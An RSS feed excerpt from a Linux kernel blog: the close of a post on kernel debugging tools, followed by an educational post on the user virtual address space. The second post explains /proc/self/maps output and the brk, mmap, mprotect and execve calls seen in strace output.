<h4 id="other-stuff">Other Stuff</h4>
<p>As we&rsquo;re transitioning into a speedrun, congratulations to anyone who read the whole thing, I&rsquo;ll attempt to quickly touch on some other useful debugging resources:</p>
<ul>
<li><a href="https://github.com/osandov/drgn">drgn</a>: remember earlier, when I said debugging the kernel your using can be tricky? Well drgn is an extremely programmable debugger, written in python (and not 36 years ago), that among other things allows you to do live introspection on your kernel. I still need to explore this more, but I wouldn&rsquo;t see it as a replacement for gdb for example, but a different tool for different goals.</li>
<li><strong>strace</strong>: ah yes, our old friend, strace(1). The system call tracing utility can be useful for complimenting your kernel debugging by tracing the interactions between your poc/userland interface/program and the kernel. With minimal faff you can hone in on what kernel functions you may want to focus your debugging endeavours on.</li>
<li><strong>procfs</strong>: another reminder about the various introspection available via <code>/proc/</code>; you saw earlier that we made use of <code>/proc/modules</code>. There&rsquo;s plenty to explore here.</li>
<li><strong>man pages</strong>: don&rsquo;t sleep on the man pages! Although there isn&rsquo;t generally pages on kernel internals, the syscall section <code>(2)</code> can help with understanding some of the interactions that go on</li>
<li><strong>source</strong>: due to word count concerns, oops, and the fact I never really use it, I haven&rsquo;t included adding source into gdb but that doesn&rsquo;t mean you can&rsquo;t have it up for reference! I always try to have a copy of source handy to explore, not to mention the documentation that&rsquo;s usually available somewhere in the kernel too</li>
</ul>
<hr>
<ol>
<li><a href="https://www.sourceware.org/gdb/">https://www.sourceware.org/gdb/</a></li>
<li><a href="https://sourceware.org/gdb/onlinedocs/gdb/Remote-Stub.html">https://sourceware.org/gdb/onlinedocs/gdb/Remote-Stub.html</a></li>
<li>Future post idea? Dive into some debugging internals</li>
<li><a href="https://github.com/sam4k/linux-kernel-resources/tree/main/debugging#gdb--vm">https://github.com/sam4k/linux-kernel-resources/tree/main/debugging#gdb&ndash;vm</a></li>
<li>If your guest is a different architecture to your host, gdb needs to needs to know about it, so you&rsquo;ll need to install and use <code>gdb-multiarch</code>  </li>
</ol>
<h2 id="faq">FAQ</h2>
<p>So this is a little bit of an experiment, and maybe more suited to the GitHub repo, but if anyone has any questions feel free to <a href="https://twitter.com/sam4k1">@ me on Twitter</a> and I&rsquo;ll keep try keep this FAQ updated. Also, if anyone has any suggestions for FAQs, I&rsquo;m happy to add those too :)</p>
<h2 id="postamble">Postamble</h2>
<p><img src="https://sam4k.com/content/images/2022/04/didwemakeit.gif" alt=""></p>
<p>Talk about feature creep, eh? We certainly covered a lot of ground in this post: from building the kernel to patching modules to setting up our debugging environment.</p>
<p>Hopefully some of this (or all!) have been useful, and maybe helped demystify things. As I briefly mentioned in the intro, I&rsquo;ve included all the essentials in a <a href="https://github.com/sam4k/linux-kernel-resources">github repository</a>, which I&rsquo;ll continue to update with any useful Linux kernel resources/demos/shenanigans.</p>
<p><a href="https://github.com/sam4k/linux-kernel-resources">GitHub - sam4k/linux-kernel-resources: Curated collection of resources, examples and scripts for Linux kernel devs, researchers and hobbyists.</a></p>
<p>I think by nature of the work we do, as programmers and &ldquo;hackers&rdquo;, a lot of times we find ourselves creating hacky solutions and shortcuts, then through some twisted process of natural selection some of these make their way into our workflow.</p>
<p>Though, perhaps because we consider them too niche or too messy, we often don&rsquo;t share these solutions or quick tricks and so the cycle continues. Is this necessarily a bad thing? Of course not! I love to tinker and believe me, I have many a bash script that should never see the light of day, but perhaps there&rsquo;s also a few that would help others if they did.</p>
<p>So really, this post is just a culmination of my own hacky, messy natural selection that has occurred during my time working on kernel stuff, so don&rsquo;t @ me if it&rsquo;s horribly wrong (DM me instead, pls help me), but hopefully there&rsquo;s some takeaways here that will inspire others to tinker and perhaps save some time in the process.</p>
<p><em><strong>Obligatory <a href="https://twitter.com/sam4k1">@ me</a> for any suggestions, corrections or questions!</strong></em></p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>Linternals: The User Virtual Address Space</title><description>We continue our journey to understand virtual memory in Linux, as we take a closer look at the user virtual address space.</description><link>https://sam4k.com/linternals-virtual-memory-0x02/</link><guid isPermaLink="false">61e3402b7742d008b38dce20</guid><category>linux</category><category>kernel</category><category>memory</category><dc:creator>sam4k</dc:creator><pubDate>Sun, 20 Mar 2022 19:00:00 +0000</pubDate><media:content url="https://sam4k.com/content/images/2022/02/linternals.gif" medium="image"/><content:encoded><![CDATA[<p>Ready to get dive back into some Linternals? I hope so! So to recap, <a href="https://sam4k.com/linternals-virtual-memory-part-1/">last time</a>, we covered some virtual memory fundamentals including:</p>
<ul>
<li>Virtual vs physical memory</li>
<li>The virtual address space</li>
<li>The VM split (user and kernel virtual address spaces)</li>
</ul>
<p>This time we&rsquo;re going to zoom in and focus on the two parts of the virtual memory split, taking a look at the user and kernel virtual address spaces.</p>
<p>Hopefully, after that, we&rsquo;ll have a good idea of how - and why - our Linux system uses virtual memory. At which point we&rsquo;ll take a look at how this is all implemented behind the scenes, examining some kernel and hardware specifics!</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#0x04-user-virtual-address-space">0x04 User Virtual Address Space</a>
<ul>
<li><a href="#userspace-mappings">Userspace Mappings</a></li>
<li><a href="#the-setup">The Setup</a>
<ul>
<li>brk()</li>
<li>mmap()</li>
<li>mprotect()</li>
<li>execve()</li>
</ul>
</li>
<li><a href="#threads">Threads</a></li>
<li><a href="#aslr">ASLR</a></li>
<li><a href="#wrapping-up-in-uvas">Wrapping Up In UVAS</a></li>
</ul>
</li>
<li><a href="#next-time">Next Time!</a></li>
</ul>
<h2 id="0x04-user-virtual-address-space">0x04 User Virtual Address Space</h2>
<p>Alrighty then, first things first, let&rsquo;s actually take a look at what a typical process actually uses the user virtual address space (UVAS) for. Luckily, I don&rsquo;t have to whip up a diagram for this, as we can use the <code>/proc</code> filesystem!</p>
<p>❓</p>
<p>procfs is a virtual filesystem that is created at boot. It acts as an interface to internal data structures in the kernel. It can be used to obtain information about the system and to change certain kernel parameters at runtime (sysctl). [1]</p>
<p>Inside procfs, you can inspect running processes by PID. For example, the file <code>/proc/854/maps</code> will contain information about the mappings for process with PID 854.</p>
<p>To make life easier, there&rsquo;s a handy link, <code>/proc/self/</code>, which will point to the process currently reading the file - pretty neat! Beyond <code>maps</code>, there&rsquo;s all sorts of information we can learn from procfs; check <code>man procfs</code> for more info.</p>
<hr>
<ol>
<li><a href="https://www.kernel.org/doc/html/latest/filesystems/proc.html">https://www.kernel.org/doc/html/latest/filesystems/proc.html</a></li>
</ol>
<h3 id="userspace-mappings">Userspace Mappings</h3>
<p>Back on topic! Let&rsquo;s use the procfs to take a closer look at what our UVAS is being used for. From the man page, we learn the <code>maps</code> procfs file contains &ldquo;the currently mapped memory regions and their access permissions&quot;m for a process.</p>
<p>We&rsquo;ll touch more on the implementation later, but for now it&rsquo;s worth remembering that the virtual address space is <strong>vast</strong> and largely empty. If a process needs to use some memory, either to load the contents of a file or to store data, it will ask the kernel to map that memory appropriately. Now that virtual address is actually pointing to something.</p>
<p>Using the <code>self</code> link we talked about earlier, and the <code>maps</code> file, we can use <code>cat</code> to output the details of it&rsquo;s own memory mappings:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-console" data-lang="console"><span class="line"><span class="cl"><span class="gp">$</span> cat /proc/self/maps 
</span></span><span class="line"><span class="cl"><span class="go">5577277d1000-5577277d3000 r--p 00000000 00:19 868257                     /usr/bin/cat
</span></span></span><span class="line"><span class="cl"><span class="go">5577277d3000-5577277d8000 r-xp 00002000 00:19 868257                     /usr/bin/cat
</span></span></span><span class="line"><span class="cl"><span class="go">5577277d8000-5577277db000 r--p 00007000 00:19 868257                     /usr/bin/cat
</span></span></span><span class="line"><span class="cl"><span class="go">5577277db000-5577277dc000 r--p 00009000 00:19 868257                     /usr/bin/cat
</span></span></span><span class="line"><span class="cl"><span class="go">5577277dc000-5577277dd000 rw-p 0000a000 00:19 868257                     /usr/bin/cat
</span></span></span><span class="line"><span class="cl"><span class="go">557728bca000-557728beb000 rw-p 00000000 00:00 0                          [heap]
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863779000-7fc863a63000 r--p 00000000 00:19 2289972                    /usr/lib/locale/locale-archive
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863a63000-7fc863a66000 rw-p 00000000 00:00 0 
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863a66000-7fc863a92000 r--p 00000000 00:19 2289282                    /usr/lib/libc.so.6
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863a92000-7fc863c08000 r-xp 0002c000 00:19 2289282                    /usr/lib/libc.so.6
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863c08000-7fc863c5c000 r--p 001a2000 00:19 2289282                    /usr/lib/libc.so.6
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863c5c000-7fc863c5d000 ---p 001f6000 00:19 2289282                    /usr/lib/libc.so.6
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863c5d000-7fc863c60000 r--p 001f6000 00:19 2289282                    /usr/lib/libc.so.6
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863c60000-7fc863c63000 rw-p 001f9000 00:19 2289282                    /usr/lib/libc.so.6
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863c63000-7fc863c72000 rw-p 00000000 00:00 0 
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863c7e000-7fc863ca0000 rw-p 00000000 00:00 0 
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863ca0000-7fc863ca2000 r--p 00000000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863ca2000-7fc863cc9000 r-xp 00002000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863cc9000-7fc863cd4000 r--p 00029000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863cd5000-7fc863cd7000 r--p 00034000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
</span></span></span><span class="line"><span class="cl"><span class="go">7fc863cd7000-7fc863cd9000 rw-p 00036000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
</span></span></span><span class="line"><span class="cl"><span class="go">7ffddc9a0000-7ffddc9c1000 rw-p 00000000 00:00 0                          [stack]
</span></span></span><span class="line"><span class="cl"><span class="go">7ffddc9f4000-7ffddc9f8000 r--p 00000000 00:00 0                          [vvar]
</span></span></span><span class="line"><span class="cl"><span class="go">7ffddc9f8000-7ffddc9fa000 r-xp 00000000 00:00 0                          [vdso]
</span></span></span><span class="line"><span class="cl"><span class="go">ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]
</span></span></span></code></pre></div><p>Sweet! Well, there&rsquo;s a lot to unpack here, though some of it should look familiar. Consulting <code>man procfs</code> we can see the columns are as follows:</p>
<p><code>(virtual) address,   perms,   offset,   dev,   inode,   pathname</code></p>
<p>If we recall from last time, on a typical x86_64 setup like mine, the most significant 16 bits (MSB 16) of userspace virtual addresses are 0 and 1 for kernel virtual addresses.</p>
<p>This means we can normally spot kernel addresses at a glance as they begin <code>0xffff....</code> while userspace addresses begin with <code>0x0000...</code> and are as a result typically shorter.</p>
<p>Anyway, before we scroll too far away from the code block (oops), let&rsquo;s unpack some of these lines of output shall we?</p>
<ul>
<li><strong>Lines 2-6</strong>: here we can see the mappings for the binary being run, found at <code>/usr/bin/cat</code>. Why is there multiple mappings for one binary file? Typically programs are made up of multiple sections, with differing perms. The .text section where the code is? We&rsquo;ll want that readable &amp; executable. Some portions of data, like our static consts want to be read only (.rodata), while mutable data wants to be readable and writable (.data) [1]</li>
<li><strong>Line 7:</strong> procfs uses the pseudo-path <code>[heap]</code> to describe the mapping for the heap (no surprise there); a dynamic memory pool</li>
<li><strong>Lines 8,10-15:</strong> next up we can see several shared libraries being mapped into memory, for the program to use. We can see locale information and libc; again these may be split up into multiple mappings as touched on a moment ago [2]</li>
<li><strong>Lines 9,16,17:</strong> these weird mappings with no pathname, are called <strong>anonymous mappings</strong> and are not backed by any file. This is essentially a blank memory region that a userspace process can use at it&rsquo;s discretion. Examples of anonymous mappings include both the stack and the heap [3]</li>
<li><strong>Lines 18-22:</strong> <code>ld.so</code> is the dynamic linker that is invoked anytime we run a dynamically linked program (a quick check of <code>file /usr/bin/cat</code> will confirm this is indeed a dynamically linked program!)</li>
<li><strong>Line 23:</strong> another pseudo-path, <code>[stack]</code> is the mapping for our process&rsquo;s stack space</li>
<li><strong>Line 25:</strong> The &ldquo;virtual dynamic shared object&rdquo; (or vDSO) is a small shared library exported by the kernel to accelerate the execution of certain system calls that do not necessarily have to run in kernel space [5]</li>
<li><strong>Line 24:</strong> The <code>vvar</code> is a special page mapped into memory in order to store a &ldquo;mirror&rdquo; of kernel variables required by the virtual syscalls exported by the kernel</li>
<li><strong>Line 26:</strong> The <code>vsyscall</code> mapping is actually defunct; it was a legacy mapping that actually provided an executable mapping of kernel code for specific syscalls that didn&rsquo;t require elevated privileges and hence the whole user  -&gt; kernel mode context switch. Suffice to say it&rsquo;s defunct now, and calls to vsyscall table still work for compatible, but now actually trap and act as a normal syscall [6]</li>
</ul>
<p>And just like that we&rsquo;ve pieced together the various userspace (and some kernel stuff) mappings for an everyday program like <code>cat</code>! Pretty neat. In addition we&rsquo;ve dived into some of the tools the kernel provides us to examine this information.</p>
<hr>
<ol>
<li>For more information on the different sections of our binary, we can cross-reference the <code>offset</code> information we get from <code>/proc/self/maps</code> with the ELF section headers using <code>objdump -h /usr/bin/cat</code></li>
<li><code>ldd</code> lets us print the shared libraries required by a program, we can explore this more by checking out <code>ldd /usr/bin/cat</code>, though for reasons out of scope for this talk, it won&rsquo;t look identically to our <code>maps</code> output</li>
<li>If we want to get ahead of ourselves, <code>man 2 mmap</code> [4] describes the system call userspace programs use to ask the kernel to map regions of memory</li>
<li>The <code>2</code> in <code>man 2 mmap</code> says we want to look at man section 2, for syscalls, and not section 3 for lib functions. <code>man -k mmap</code> lets us search all the sections for references to <code>mmap</code></li>
<li><a href="https://lwn.net/Articles/615809/">Implementing virtual system calls @ LWN</a></li>
<li>As expected, we can see the vsycall adress is located within the kernel half of the virtual address space, by the leading <code>0xffff...</code></li>
</ol>
<h3 id="the-setup">The Setup</h3>
<p>I think I&rsquo;m going to cover kernel and hardware side of things in coming sections, but I think it&rsquo;s worth touching on how we go from running <code>cat /proc/self/maps</code> to the memory mapping we saw above.</p>
<p><img src="https://sam4k.com/content/images/2022/03/how_that_happeen.gif" alt=""></p>
<p>In the last part we mentioned that system calls act as the fundamental interface between userspace applications and the kernel. If an unprivileged userspace process needs to do a privileged action (e.g. map some memory), it can use the syscall interface to ask the kernel to carry out this action on it&rsquo;s behalf [1].</p>
<p>Now that we know what&rsquo;s being mapped, let&rsquo;s have a closer look on how, by revisiting <code>strace</code>. <code>strace</code> simply traces the system calls and signals made by a program. As we know memory mapping is handled by the kernel and system calls are how programs get the kernel to do this, <code>strace</code> seems like a good bet!</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-console" data-lang="console"><span class="line"><span class="cl"><span class="gp">$</span> strace cat /proc/self/maps
</span></span><span class="line"><span class="cl"><span class="go">execve(&#34;/usr/bin/cat&#34;, [&#34;cat&#34;, &#34;/proc/self/maps&#34;], 0x7fff3a014fd8 /* 61 vars */) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">brk(NULL)                               = 0x5622ee613000
</span></span></span><span class="line"><span class="cl"><span class="go">arch_prctl(0x3001 /* ARCH_??? */, 0x7ffe5d536650) = -1 EINVAL (Invalid argument)
</span></span></span><span class="line"><span class="cl"><span class="go">access(&#34;/etc/ld.so.preload&#34;, R_OK)      = -1 ENOENT (No such file or directory)
</span></span></span><span class="line"><span class="cl"><span class="go">openat(AT_FDCWD, &#34;/etc/ld.so.cache&#34;, O_RDONLY|O_CLOEXEC) = 3
</span></span></span><span class="line"><span class="cl"><span class="go">newfstatat(3, &#34;&#34;, {st_mode=S_IFREG|0644, st_size=185283, ...}, AT_EMPTY_PATH) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">mmap(NULL, 185283, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fa129bcd000
</span></span></span><span class="line"><span class="cl"><span class="go">close(3)                                = 0
</span></span></span><span class="line"><span class="cl"><span class="go">openat(AT_FDCWD, &#34;/usr/lib/libc.so.6&#34;, O_RDONLY|O_CLOEXEC) = 3
</span></span></span><span class="line"><span class="cl"><span class="go">read(3, &#34;\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0&gt;\0\1\0\0\0\320\324\2\0\0\0\0\0&#34;..., 832) = 832
</span></span></span><span class="line"><span class="cl"><span class="go">pread64(3, &#34;\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0&#34;..., 784, 64) = 784
</span></span></span><span class="line"><span class="cl"><span class="go">pread64(3, &#34;\4\0\0\0@\0\0\0\5\0\0\0GNU\0\2\0\0\300\4\0\0\0\3\0\0\0\0\0\0\0&#34;..., 80, 848) = 80
</span></span></span><span class="line"><span class="cl"><span class="go">pread64(3, &#34;\4\0\0\0\24\0\0\0\3\0\0\0GNU\0\205vn\235\204X\261n\234|\346\340|q,\2&#34;..., 68, 928) = 68
</span></span></span><span class="line"><span class="cl"><span class="go">newfstatat(3, &#34;&#34;, {st_mode=S_IFREG|0755, st_size=2463384, ...}, AT_EMPTY_PATH) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fa129bcb000
</span></span></span><span class="line"><span class="cl"><span class="go">pread64(3, &#34;\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0&#34;..., 784, 64) = 784
</span></span></span><span class="line"><span class="cl"><span class="go">mmap(NULL, 2136752, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fa1299c1000
</span></span></span><span class="line"><span class="cl"><span class="go">mprotect(0x7fa1299ed000, 1880064, PROT_NONE) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">mmap(0x7fa1299ed000, 1531904, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2c000) = 0x7fa1299ed000
</span></span></span><span class="line"><span class="cl"><span class="go">mmap(0x7fa129b63000, 344064, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1a2000) = 0x7fa129b63000
</span></span></span><span class="line"><span class="cl"><span class="go">mmap(0x7fa129bb8000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1f6000) = 0x7fa129bb8000
</span></span></span><span class="line"><span class="cl"><span class="go">mmap(0x7fa129bbe000, 51888, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fa129bbe000
</span></span></span><span class="line"><span class="cl"><span class="go">close(3)                                = 0
</span></span></span><span class="line"><span class="cl"><span class="go">mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fa1299be000
</span></span></span><span class="line"><span class="cl"><span class="go">arch_prctl(ARCH_SET_FS, 0x7fa1299be740) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">set_tid_address(0x7fa1299bea10)         = 28003
</span></span></span><span class="line"><span class="cl"><span class="go">set_robust_list(0x7fa1299bea20, 24)     = 0
</span></span></span><span class="line"><span class="cl"><span class="go">rseq(0x7fa1299bf0e0, 0x20, 0, 0x53053053) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">mprotect(0x7fa129bb8000, 12288, PROT_READ) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">mprotect(0x5622ec6d3000, 4096, PROT_READ) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">mprotect(0x7fa129c30000, 8192, PROT_READ) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">munmap(0x7fa129bcd000, 185283)          = 0
</span></span></span><span class="line"><span class="cl"><span class="go">getrandom(&#34;\x62\xf6\x2b\x64\xd3\x81\xee\x98&#34;, 8, GRND_NONBLOCK) = 8
</span></span></span><span class="line"><span class="cl"><span class="go">brk(NULL)                               = 0x5622ee613000
</span></span></span><span class="line"><span class="cl"><span class="go">brk(0x5622ee634000)                     = 0x5622ee634000
</span></span></span><span class="line"><span class="cl"><span class="go">openat(AT_FDCWD, &#34;/usr/lib/locale/locale-archive&#34;, O_RDONLY|O_CLOEXEC) = 3
</span></span></span><span class="line"><span class="cl"><span class="go">newfstatat(3, &#34;&#34;, {st_mode=S_IFREG|0644, st_size=3053472, ...}, AT_EMPTY_PATH) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">mmap(NULL, 3053472, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fa1296d4000
</span></span></span><span class="line"><span class="cl"><span class="go">close(3)                                = 0
</span></span></span><span class="line"><span class="cl"><span class="go">newfstatat(1, &#34;&#34;, {st_mode=S_IFCHR|0600, st_rdev=makedev(0x88, 0x1), ...}, AT_EMPTY_PATH) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">openat(AT_FDCWD, &#34;/proc/self/maps&#34;, O_RDONLY) = 3
</span></span></span><span class="line"><span class="cl"><span class="go">newfstatat(3, &#34;&#34;, {st_mode=S_IFREG|0444, st_size=0, ...}, AT_EMPTY_PATH) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">fadvise64(3, 0, 0, POSIX_FADV_SEQUENTIAL) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">mmap(NULL, 139264, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fa129bd9000
</span></span></span><span class="line"><span class="cl"><span class="go">read(3, &#34;5622ec6c9000-5622ec6cb000 r--p 0&#34;..., 131072) = 2153
</span></span></span><span class="line"><span class="cl"><span class="go">write(1, &#34;5622ec6c9000-5622ec6cb000 r--p 0&#34;..., 21535622ec6c9000-5622ec6cb000 r--p 00000000 00:19 868257                     /usr/bin/cat
</span></span></span><span class="line"><span class="cl"><span class="go">5622ec6cb000-5622ec6d0000 r-xp 00002000 00:19 868257                     /usr/bin/cat
</span></span></span><span class="line"><span class="cl"><span class="go">5622ec6d0000-5622ec6d3000 r--p 00007000 00:19 868257                     /usr/bin/cat
</span></span></span><span class="line"><span class="cl"><span class="go">5622ec6d3000-5622ec6d4000 r--p 00009000 00:19 868257                     /usr/bin/cat
</span></span></span><span class="line"><span class="cl"><span class="go">5622ec6d4000-5622ec6d5000 rw-p 0000a000 00:19 868257                     /usr/bin/cat
</span></span></span><span class="line"><span class="cl"><span class="go">5622ee613000-5622ee634000 rw-p 00000000 00:00 0                          [heap]
</span></span></span><span class="line"><span class="cl"><span class="go">7fa1296d4000-7fa1299be000 r--p 00000000 00:19 2289972                    /usr/lib/locale/locale-archive
</span></span></span><span class="line"><span class="cl"><span class="go">7fa1299be000-7fa1299c1000 rw-p 00000000 00:00 0 
</span></span></span><span class="line"><span class="cl"><span class="go">7fa1299c1000-7fa1299ed000 r--p 00000000 00:19 2289282                    /usr/lib/libc.so.6
</span></span></span><span class="line"><span class="cl"><span class="go">7fa1299ed000-7fa129b63000 r-xp 0002c000 00:19 2289282                    /usr/lib/libc.so.6
</span></span></span><span class="line"><span class="cl"><span class="go">7fa129b63000-7fa129bb7000 r--p 001a2000 00:19 2289282                    /usr/lib/libc.so.6
</span></span></span><span class="line"><span class="cl"><span class="go">7fa129bb7000-7fa129bb8000 ---p 001f6000 00:19 2289282                    /usr/lib/libc.so.6
</span></span></span><span class="line"><span class="cl"><span class="go">7fa129bb8000-7fa129bbb000 r--p 001f6000 00:19 2289282                    /usr/lib/libc.so.6
</span></span></span><span class="line"><span class="cl"><span class="go">7fa129bbb000-7fa129bbe000 rw-p 001f9000 00:19 2289282                    /usr/lib/libc.so.6
</span></span></span><span class="line"><span class="cl"><span class="go">7fa129bbe000-7fa129bcd000 rw-p 00000000 00:00 0 
</span></span></span><span class="line"><span class="cl"><span class="go">7fa129bd9000-7fa129bfb000 rw-p 00000000 00:00 0 
</span></span></span><span class="line"><span class="cl"><span class="go">7fa129bfb000-7fa129bfd000 r--p 00000000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
</span></span></span><span class="line"><span class="cl"><span class="go">7fa129bfd000-7fa129c24000 r-xp 00002000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
</span></span></span><span class="line"><span class="cl"><span class="go">7fa129c24000-7fa129c2f000 r--p 00029000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
</span></span></span><span class="line"><span class="cl"><span class="go">7fa129c30000-7fa129c32000 r--p 00034000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
</span></span></span><span class="line"><span class="cl"><span class="go">7fa129c32000-7fa129c34000 rw-p 00036000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
</span></span></span><span class="line"><span class="cl"><span class="go">7ffe5d517000-7ffe5d538000 rw-p 00000000 00:00 0                          [stack]
</span></span></span><span class="line"><span class="cl"><span class="go">7ffe5d5c7000-7ffe5d5cb000 r--p 00000000 00:00 0                          [vvar]
</span></span></span><span class="line"><span class="cl"><span class="go">7ffe5d5cb000-7ffe5d5cd000 r-xp 00000000 00:00 0                          [vdso]
</span></span></span><span class="line"><span class="cl"><span class="go">ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]
</span></span></span><span class="line"><span class="cl"><span class="go">) = 2153
</span></span></span><span class="line"><span class="cl"><span class="go">read(3, &#34;&#34;, 131072)                     = 0
</span></span></span><span class="line"><span class="cl"><span class="go">munmap(0x7fa129bd9000, 139264)          = 0
</span></span></span><span class="line"><span class="cl"><span class="go">close(3)                                = 0
</span></span></span><span class="line"><span class="cl"><span class="go">close(1)                                = 0
</span></span></span><span class="line"><span class="cl"><span class="go">close(2)                                = 0
</span></span></span><span class="line"><span class="cl"><span class="go">exit_group(0)                           = ?
</span></span></span><span class="line"><span class="cl"><span class="go">+++ exited with 0 +++
</span></span></span></code></pre></div><p>As we mentioned last time, there&rsquo;s <strong>a lot going on here</strong> for a program we expect to just be doing the equivalent of <code>read(/proc/self/maps)</code> and <code>write(stdout</code>. In fact, on <strong>line 47</strong> &amp; <strong>48</strong> we can see just that happening. So what&rsquo;s up with the rest?</p>
<p>I&rsquo;m thinking it might be out-of-scope for this post to do a line-by-line breakdown (maybe a more specific post about ELFs and processes and stuff?), but let&rsquo;s highlight some of the main syscalls used for setting up our memory mapping:</p>
<h4 id="brk">brk()</h4>
<p>The <code>brk()</code> syscall is used to adjust the location of the &ldquo;program break&rdquo;, which defines the end of the process&rsquo;s data segment (aka end of the heap).</p>
<p>❓</p>
<p><code>void *brk(void *addr);</code></p>
<p><code>brk(NULL)</code> makes no adjustment, so returns the current program break. We can see this on <strong>line 3</strong>, which is likely called during initialisation to figure out where the current heap ends, for memory management libs like malloc.</p>
<p>Later on <strong>line 37</strong> we can see another call to <code>brk()</code>, asking to extend the program break to <code>0x5622ee634000</code>. If we take a look at the <code>maps</code> output on <strong>line 53</strong>, we can in fact see the heap does end at <code>0x5622ee634000</code> now! Sweet :)</p>
<h4 id="mmap">mmap()</h4>
<p>This is the big gun, responsible for the fabled &ldquo;mappings&rdquo; we&rsquo;ve been yapping on about. The <code>mmap()</code> syscall is used to create memory mappings (and <code>munmap()</code> for unmapping them). For more info on args and more, don&rsquo;t forget to console <code>man 2 mmap</code>.</p>
<p>❓</p>
<p><code>void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);</code></p>
<p>Remember, we can use <code>mmap()</code> to either map a file or device to virtual memory or simply to allocate a black region of memory to a virtual address:</p>
<ul>
<li>On <strong>line 10</strong> we <code>openat()</code> our libc, identified by file descriptor 3. Then in <strong>lines 18-22</strong> we can see we make a series of <code>mmap()</code>&rsquo;s with the fd arg set to 3; we can then cross-reference the permissions (e.g. <code>PROT_READ|PROT_WRITE</code>) and return addresses with the libc mappings we can see in our <code>maps</code> output on <strong>lines 56-61</strong></li>
<li>Conversely we can see some anonymous mappings, where the fd is set to <code>-1</code> and <code>mmap()</code> is passed the flag <code>MAP_ANONYMOUS</code>,  like  <strong>line 46</strong> [2]</li>
</ul>
<h4 id="mprotect">mprotect()</h4>
<p>If  <code>mmap()</code> is the big gun, then <code>mprotect()</code> is the syscall used set the protections for a mapped region of memory (yeah, I couldn&rsquo;t think of an analogy okay).  Typically these protections may be any combination of read, write and execute access flags.</p>
<p>❓</p>
<p><code>int mprotect(void *addr, size_t len, int prot);</code></p>
<p>While we can include protection flags via the <code>prot</code>  arg for <code>mmap()</code>, <code>mprotect()</code> allows us to set page granular access flags which we can update with each call, without having to map new regions of memory each time.</p>
<h4 id="execve">execve()</h4>
<p>Some of you might have noticed that while we can see regions being mapped for locale-archive, libc; what happened to <code>/usr/bin/cat</code> itself? Again, trying to keep within scope of virtual memory, this setup is handled by the initial <code>execve()</code> system call on <strong>line 1</strong>.</p>
<p>❓</p>
<p><code>int execve(const char *pathname, char *const argv[], char *const envp[]);</code></p>
<p>When a new processes is forked (created), execve() then &ldquo;executes the program referred to by <code>pathname</code>&rdquo; [3]. This initial call to <code>execve()</code> parses our ELF file <code>/usr/bin/cat</code> and initialises the necessary segments (e.g. text, stack, heap and  data).</p>
